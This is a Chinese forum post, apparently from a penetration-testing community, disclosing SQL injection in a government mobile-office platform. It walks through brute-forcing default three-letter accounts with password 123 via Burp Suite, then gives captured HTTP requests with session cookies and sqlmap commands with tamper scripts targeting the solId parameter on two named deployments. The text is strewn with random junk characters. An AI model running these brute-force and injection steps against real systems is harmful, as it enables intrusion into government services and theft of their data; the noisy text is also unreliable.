8 ~0 x2 ~. _; d' s1 _2 K
/ j8 T& v+ _' I) w+ f6 i 平台简介:
& d }1 [7 x6 B5 A% J, e0 H/ z. ]# A( [5 `" A
}# o U0 I& Q6 B4 i
3 [+ B8 P, R1 H
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
' S% `! O0 c! j6 g4 r- N) i R3 D' N/ U5 Y* \1 X
h' G8 C/ e7 r0 Y! ~) ^3 j 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:; `) V, f4 _4 F; K0 g( m
+ M5 h. Z! X6 s4 [) v2 H+ X; `
http://1.1.1.1:7197/cap-aco/#(案例2-)+ K' F7 L& b1 Q+ [
q: e" e% @2 v. M' r$ yhttp://www.XXOO.com (案例1-官网网站)
* R) w& M- @0 J
漏洞详情:
F S0 j* W4 s6 N 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
8 P7 z* ~& X3 I- I3 {* f* e! R5 H/ b 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
1 @# \% q" J3 _1 f* H! F( c0 u0 c" `
5 d- i3 Q) F# \' K6 X/ @$ n7 V' @ G
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
; d+ s7 l' h! U, \* `3 s 1、案例1-官方网站 _8 C' r; u; r- \
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1# \4 P. c+ m: S; H0 I& R B8 w4 W. o Host:
+ k3 o' s4 z. G. Q, o) M, z5 U- Z Proxy-Connection: Keep-Alive# U4 E& Q x* `0 [+ G
) q7 \2 G ? ^ R1 H7 U {. j; V& n* S+ h! I Accept: application/json, text/javascript, */*; q=0.01, v# o- ?" b4 g: N
3 q' l/ I5 o" w8 q9 [% d7 f. k- S4 ` Accept-Language: zh-CN
Content-Type: application/json8 H+ L- t+ Z# ?3 W8 H' ^+ Y
6 S+ R& T: }$ A+ Y5 f* M+ n User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
8 Q. E2 [4 s/ |" y- u8 g" D+ W; {) _ X-Requested-With: XMLHttpRequest
http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0029 |6 P; Q& q( s8 i# X" |) x
8 n8 e' s- _; i0 R5 j Referer:+ p [* u W) T& w Accept-Encoding: gzip, deflate, sdch
9 r0 r5 K6 P1 L; h4 v+ J Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e, v, J" D6 F" _5 d- S R7 y
9 Z& |0 `( S; i; S将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:6 }" `% a: U" Z3 P7 O6 Y
4 J- f- ~9 X. V( n* I: w
+ r3 z& L5 x; m0 x) [4 i
$ Z- B9 k8 r }3 x3 h
5 D% z7 {8 @5 z3 s# t: r( l/ E
( T- t( z( P7 n+ Y
R, d; P3 R& M5 g: p; u0 i5 ?2 G * F: ^, ~6 _. F H6 m3 k5 N4 s+ ?
+ J0 q0 q4 [7 M; K& t/ o1 U5 N. q
4 z: r( H- [4 _$ r 2、案例2-某天河云平台- `1 T( r U/ l# T; |
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.10 D/ {1 }, O$ b
Host: 1.1.1.:7197" Z6 x1 H$ s. f5 N7 k* F) Z7 U; q
. v1 b, \' c' h, k# F Accept: application/json, text/javascript, */*; q=0.01
: a+ K% \* w$ v; w8 L1 c; G7 c. t4 o: [8 T$ `& B5 C X-Requested-With: XMLHttpRequest( U5 W% I3 D: l7 `
) N2 P( |2 O& U, S1 V! v/ _* U3 e4 U, } User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
V( H1 T: [# n- `( D+ e Content-Type: application/json, c/ B; V1 |6 L9 w
g/ I9 d0 O( Z+ m" g Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
# X& H! \# u4 w1 N1 q Q0 |. o+ g W l4 I0 }. B Accept-Language: zh-CN,zh;q=0.80 O! U8 ]% a( K1 Y9 c
8 F1 L! h: b5 F4 E. M' z, n0 V/ e) L, \" l* }# G Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1, q8 ]' z) V1 |9 A9 Z8 r
Connection: close
3 V" |7 Y. m: B9 H& f 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
' d: P9 U" n/ [/ m5 Z3 r( h* ^6 Z p6 M
. `- v) p8 y& M& d1 I9 \. I# A4 E
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |